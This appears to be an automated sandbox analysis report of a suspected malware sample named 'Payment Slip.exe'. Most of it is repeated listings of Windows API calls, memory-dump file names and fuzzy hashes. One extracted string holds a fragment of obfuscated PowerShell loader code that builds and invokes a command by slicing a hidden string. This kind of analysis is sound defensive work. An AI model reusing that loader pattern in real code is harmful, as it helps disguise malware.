                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                              • Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
                                              • Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                              • Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D
                                              APIs
                                              • SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                              • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                              • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                              • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                              • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                              • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                              • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                              APIs
                                              • KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherUser
                                              • String ID:
                                              • API String ID: 2492992576-0
                                              • Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                              • Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
                                              • Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                              • Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 00404B26
                                              • GetDlgItem.USER32(?,00000408), ref: 00404B31
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
                                              • LoadBitmapW.USER32(0000006E), ref: 00404B8E
                                              • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
                                              • DeleteObject.GDI32(00000000), ref: 00404C04
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
                                              • ShowWindow.USER32(?,00000005), ref: 00404D5E
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
                                              • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
                                              • GlobalFree.KERNEL32(?), ref: 00404F3E
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
                                              • ShowWindow.USER32(?,00000000), ref: 004050DD
                                              • GetDlgItem.USER32(?,000003FE), ref: 004050E8
                                              • ShowWindow.USER32(00000000), ref: 004050EF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $M$N
                                              • API String ID: 1638840714-813528018
                                              • Opcode ID: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
                                              • Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
                                              • Opcode Fuzzy Hash: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
                                              • Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 00404617
                                              • SetWindowTextW.USER32(00000000,?), ref: 00404641
                                              • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
                                              • CoTaskMemFree.OLE32(00000000), ref: 004046FD
                                              • lstrcmpiW.KERNEL32(: Completed,004226D0,00000000,?,?), ref: 0040472F
                                              • lstrcatW.KERNEL32(?,: Completed), ref: 0040473B
                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
                                                • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
                                                • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment Slip.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
                                                • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Payment Slip.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
                                                • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206
                                              • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
                                              • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
                                              Strings
                                              • ';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) ", xrefs: 004045E1
                                              • : Completed, xrefs: 00404729, 0040472E, 00404739
                                              • A, xrefs: 004046EB
                                              • C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00404718
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                              • String ID: ';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "$: Completed$A$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes
                                              • API String ID: 2246997448-460327463
                                              • Opcode ID: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
                                              • Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
                                              • Opcode Fuzzy Hash: f2a9d0b57340297d45baa60d2932fe1aa1b7a4c7a5e87a3ea4adcdb859a397aa
                                              • Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69
                                              APIs
                                              • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 004020F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes
                                              • API String ID: 542301482-449055245
                                              • Opcode ID: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
                                              • Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
                                              • Opcode Fuzzy Hash: 8b26743c023bf28b8b2e00583d47188004e3d905e92f390383a9ff735553564a
                                              • Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
                                              • Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
                                              • Opcode Fuzzy Hash: c0063f51e7f363112a8f0b2caa108a2fa28ea3b78be3eb4e01cdcd5ed5f571bf
                                              • Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
                                              • GetDlgItem.USER32(?,000003E8), ref: 0040437C
                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
                                              • GetSysColor.USER32(?), ref: 004043AA
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
                                              • lstrlenW.KERNEL32(?), ref: 004043CB
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
                                              • GetDlgItem.USER32(?,0000040A), ref: 00404446
                                              • SendMessageW.USER32(00000000), ref: 0040444D
                                              • GetDlgItem.USER32(?,000003E8), ref: 00404478
                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
                                              • SetCursor.USER32(00000000), ref: 004044CC
                                              • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
                                              • SetCursor.USER32(00000000), ref: 004044F0
                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                              • String ID: : Completed$AB@$N$open
                                              • API String ID: 3615053054-1317861079
                                              • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                              • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
                                              • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                              • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
                                              APIs
                                              • lstrcpyW.KERNEL32(00425D70,NUL), ref: 00405C16
                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
                                              • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
                                                • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                              • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
                                              • wsprintfA.USER32 ref: 00405C7E
                                              • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
                                              • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
                                              • GlobalFree.KERNEL32(00000000), ref: 00405D6F
                                              • CloseHandle.KERNEL32(00000000), ref: 00405D76
                                                • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                              • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                              • API String ID: 1265525490-3322868524
                                              • Opcode ID: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
                                              • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
                                              • Opcode Fuzzy Hash: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
                                              • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                              • DeleteObject.GDI32(?), ref: 004010ED
                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                              • SelectObject.GDI32(00000000,?), ref: 00401140
